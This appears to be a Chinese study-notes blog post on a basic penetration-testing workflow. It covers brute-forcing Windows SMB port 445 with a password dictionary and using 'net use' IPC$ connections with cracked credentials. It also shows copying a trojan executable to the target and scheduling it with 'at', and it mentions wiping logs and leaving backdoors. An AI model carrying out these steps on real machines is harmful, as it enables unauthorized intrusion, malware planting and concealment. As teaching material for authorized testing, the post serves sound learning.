day09 1 簡單滲透測試流程

2022-09-10 06:57:12 字數 2948 閱讀 8069

和甲方簽合同被授權(不授權就是非法)

資訊收集:要攻擊的物件都有哪些人,什麼系統,有多少臺是伺服器,這些伺服器都是什麼伺服器(即伺服器上開了什麼埠號)

攻擊**是為了拿到發布此**的伺服器的最高許可權---伺服器管理員賬號和密碼,對**本身並不關心。知道ip和賬號密碼就可以使用telnet遠端控制此伺服器了。那麼伺服器上的資料都可以擋下來,比如資料庫中的資訊

漏洞利用:從最簡單的漏洞入手,乙個乙個試

提權:拿到對方的shell視窗(命令列視窗)、拿到對方的最高許可權、或者拿到對方的桌面環境

毀屍滅跡:操作會在日誌中記錄,要刪除日誌中的記錄

留後門:下次再攻擊就不需要這麼多步驟了,直接攻擊、控制即可(一般就是植入木馬等)

做滲透測試報告

如果再給錢,就可以針對漏洞做安全加固

以上是簡單的滲透測試步驟,不一定全面也不一定每個步驟都有,這裡簡單知道一下,後面會全面講解

scanport:可以設定掃瞄ip的範圍以及指定埠的小巧工具(windows使用)

ntscan:只能針對139(網路共享的埠)/445埠彈框進行暴力破解(windows使用)

這裡專門講解針對445埠暴力破解的原理,其他埠的爆破也有其他的原理

將自己的電腦和要攻擊物件處於同一網段(通過上述滲透原理可知)

使用掃瞄工具比如scanport設定掃瞄ip範圍以及埠號445,確定下來哪些伺服器或pc開啟445埠,只要掃瞄到開啟的就可以考慮進行445攻擊了

通過社會工程學獲取相關資訊,利用密碼字典生成器,生成密碼字典(伺服器的使用者名稱一般都為adminsitrator);將字典txt檔案中的密碼複製到nt_pass.dic檔案中,方便ntscan10爆破工具使用

再使用專門針對445埠暴力破解軟體比如ntscan10,針對指定ip的主機及指定埠445/139,利用生成的密碼字典進行暴力破解,得到對方的賬號密碼

再通過命令net use \\10.1.1.2\ipc$ 123.com /user:administrator(破解到的目標ip為10.1.1.2,使用者名為administrator,密碼為123.com)與對方的空連線ipc$建立連線

ipc$:為預設開啟的共享,由於沒有關聯任何路徑(不像c$d:這些),所以稱為空連線,但只要連線到對方的ipc$,就連線了對方的整個電腦,可以通過命令對對方電腦做任何操作

通過命令操作對方電腦(注意要使用網路路徑\\和共享檔案或者磁碟的共享名)

以前dos命令涉及到路徑的地方都改為網路路徑即可(\\10.1.1.2\d$表示對方電腦下的d盤),不要出現d:(寫共享名)

植入木馬啟動木馬對對方電腦做檢視或修改

telent 目標ip 埠號     #手工測試埠號開放
net use \\目標主機ip\ipc$ 密碼 /user:使用者名稱     #建立空連線

net use f: \\10.1.1.1\c$ 密碼 /user:使用者名稱 #建立連線對映到本地磁碟

以下為建立空連線後,才能執行的相關操作

copy 本地路徑\檔名.字尾名 \\目標ip\碟符$\路徑    #將本地檔案拷入到對方電腦的路徑下

#舉例:

copy d:\muma.exe \\10.1.1.2\c$\system

net time      #檢視本地時間

net time \\10.1.1.1 #檢視指定主機的電腦時間(前提是要先與對方主機建立空連線)

at    #顯示本地計畫任務列表

at \\10.1.1.1 #顯示指定主機的計畫任務列表(前提是與對方主機建立空連線)

at \\10.1.1.1 19:30 "c:\system\muma.exe" #在指定時間執行相關對方主機上的某程式(前提是建立空連線)

win10系統已經用該命令:替換為schtasks

滲透測試的簡單流程

滲透測試流程 首先明確目標 確定範圍 確定規則 確定需求 一 資訊收集 永遠是第一步 基礎資訊 公司 單位 公司名稱,上下屬單位,和其他公司關係,註冊時間,註冊人,註冊郵箱,某某某在什麼地方是100 控股的,子網域名稱 系統資訊 應用版本 存在版本上的歷史漏洞 是什麼系統 應用資訊 應用資訊 使用的...

滲透測試流程

1 資訊收集 a.伺服器的相關資訊 真實ip,系統型別,版本,開放埠,waf等 b.指紋識別 包括,cms,cdn,證書等 dns記錄 c.whois資訊,姓名,備案,郵箱,反查 郵箱丟社工庫,社工準備等 d.子網域名稱收集,旁站查詢 有授權可滲透 c段等 e.google hacking針對化搜尋...

滲透測試流程

滲透測試 更全面地找出伺服器的問題,更傾向於保護。入侵 不擇手段 甚至是具有破壞性的 拿到許可權。確定範圍 確定規則 確定需求。基礎資訊 系統資訊 應用資訊 版本資訊 服務資訊 人員資訊 防護資訊 系統漏洞 webserver漏洞 web應用漏洞 其他埠服務漏洞 自動化驗證 手工驗證 試驗驗證 登入...